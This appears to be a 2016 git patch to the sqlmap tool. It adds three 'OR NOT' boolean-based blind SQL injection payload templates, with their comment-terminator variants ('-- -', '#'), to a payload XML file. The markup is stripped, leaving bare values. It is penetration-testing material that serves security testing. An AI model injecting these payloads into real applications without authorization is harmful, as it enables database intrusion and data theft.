From df8e4b504de07b6c83dd6790656e8faf3a5233fa Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 14 Jan 2016 13:51:30 +0100 Subject: [PATCH] Patch for special cases of OR boolean-based blind (covered with last two commits) --- xml/payloads/01_boolean_blind.xml | 53 +++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml index f10f65c9b..386e167f4 100644 --- a/xml/payloads/01_boolean_blind.xml +++ b/xml/payloads/01_boolean_blind.xml @@ -186,6 +186,22 @@ Tag: + + OR boolean-based blind - WHERE or HAVING clause (NOT) + 1 + 3 + 3 + 1 + 1 + OR NOT [INFERENCE] + + OR NOT [RANDNUM]=[RANDNUM] + + + OR NOT [RANDNUM]=[RANDNUM1] + + + AND boolean-based blind - WHERE or HAVING clause (Generic comment) 1 @@ -220,6 +236,23 @@ Tag: + + OR boolean-based blind - WHERE or HAVING clause (Generic comment) (NOT) + 1 + 4 + 3 + 1 + 1 + OR NOT [INFERENCE] + + OR NOT [RANDNUM]=[RANDNUM] + -- - + + + OR NOT [RANDNUM]=[RANDNUM1] + + + AND boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 @@ -260,6 +293,26 @@ Tag: + + OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT) + 1 + 3 + 3 + 1 + 1 + OR NOT [INFERENCE] + + OR NOT [RANDNUM]=[RANDNUM] + # + + + OR NOT [RANDNUM]=[RANDNUM1] + +
+ MySQL +
+
+ AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) 1